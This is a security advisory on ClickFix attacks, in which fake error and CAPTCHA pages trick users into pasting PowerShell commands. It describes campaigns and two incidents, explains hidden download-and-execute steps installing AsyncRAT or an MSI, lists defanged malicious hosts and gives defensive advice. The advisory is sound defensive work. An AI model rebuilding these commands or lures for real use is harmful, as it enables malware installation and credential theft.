ClickFix is a social engineering tactic that manipulates users into performing malicious actions under the guise of troubleshooting or system maintenance. By displaying fake error messages and fake CAPTCHA verifications, attackers persuade users to copy and paste malicious commands into the terminal or PowerShell.

FPT Threat Intelligence has also published an article about these attack campaigns, details can be found at: Warning about a new attack form impersonating Google Chrome to launch malicious PowerShell.

How ClickFix Works

The term ClickFix describes this attack scenario: convincing users to click on a link or execute a command they believe will resolve a system issue, disguised as trusted services like Google Meet, Booking.com, Cloudflare, or IT support teams.

These fake system issues are sent to targets via phishing emails, pop-up alerts, or fake system notifications. These distribution methods create a sense of urgency, causing users to inadvertently disable security mechanisms, download malware, or grant remote access to attackers.

A particularly dangerous aspect of ClickFix is when attackers instruct users to copy and paste malicious code into command-line interfaces like PowerShell (Windows) or Terminal (Mac/Linux).

Figure 1. Fake error message tricking users into copying and executing code in PowerShell

Since modern security solutions often block automatic malware downloads, attackers can bypass these protections by manipulating users to manually execute commands. If successful, attackers can gain system access equivalent to the victim, leading to data theft, credential exposure, or complete system takeover.

Additionally, a newly discovered scam involves manipulating users to paste malicious commands into PowerShell or Terminal to complete a CAPTCHA, replacing traditional CAPTCHA solving methods.

Figure 2. Fake CAPTCHA message tricking users into copying and executing code in PowerShell

Recent Increase in ClickFix Attacks

Cybersecurity researchers have noted a sharp increase in ClickFix-based attacks since late 2024. Two prominent campaigns illustrate this trend:

• OBSCURE#BAT Campaign – Targeting English-speaking users in the US, Canada, Germany, and the UK, using fake CAPTCHA verification pages. Victims are redirected to seemingly legitimate Cloudflare CAPTCHA pages, where they are tricked into copying and running a malicious .bat script to install malware.

• Phishing Campaign Storm-1865 – Attackers impersonate Booking.com to target the hospitality industry in North America, Europe, and Asia. Emails claim the business received a negative review from a guest, prompting them to click a fake link or open an attached PDF. Victims who comply inadvertently expose credentials and become infected with malware.

Example 1: Attack on a Non-Profit Organization in North America

An employee was tricked into executing the following command:

This is a PowerShell command designed to stealthily download and execute a remote script. It:

• Launches PowerShell in hidden mode.

• Creates an identifier based on the current timestamp (Unix time).

• Downloads the script from a server (138.199.161[.]141:8080) using Invoke-RestMethod (irm).

• Executes it immediately using Invoke-Expression (iex).

This script is configured to install AsyncRAT – a powerful open-source Remote Access Tool (RAT) commonly used for monitoring, keystroke logging, credential theft, and remote control of infected systems.

The IP address 138.199.161[.]141 is located in Germany and flagged as malicious by one security provider on Virus Total.

Example 2: Attack on a Canadian Construction Company

The attacker attempted to trick an employee into executing the command:

This command is designed to silently download and install a malicious MSI file:

• Uses PowerShell in hidden mode.

• Downloads the .msi file from https[:]//overtimeforus.com/dow using Invoke-WebRequest (iwr).

• Saves it to the Public directory, then automatically executes it.

The fake Cloudflare verification comment line is intended to deceive users into thinking this is a legitimate security process.

This path is flagged as malicious by 10 security providers on Virus Total.

Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent these attack campaigns:

• Limit Command Line Usage

  • Implement policies to restrict the use of PowerShell, Terminal, CMD for non-administrative users.

  • Disable the ability to run scripts from untrusted sources. Configure PowerShell execution policies to block unauthorized commands.

• Deploy Advanced Threat Detection Solutions

  • Use Managed Detection and Response (MDR) services like Field Effect MDR for continuous monitoring and anomaly detection.

  • Behavioral analysis tools help detect command copying from browsers to command lines.

• Enhance Email and Web Filtering

  • Block phishing emails that lure users into running malicious scripts.

  • Use sandboxing to inspect attachments and links before they reach the inbox.

• Train Users to Recognize ClickFix

  • Employees should be skeptical of unexpected troubleshooting instructions and never enter commands into PowerShell or CMD without verifying the source.

  • IT teams should regularly conduct phishing simulations to reinforce awareness.

• Maintain Security Updates

  • Regularly update software and security policies.

  • Conduct periodic vulnerability assessments to identify weaknesses before they are exploited.

References

• Warning about a new attack form impersonating Google Chrome to launch malicious PowerShell

• ClickFix: The rising threat of social engineering through fake fixes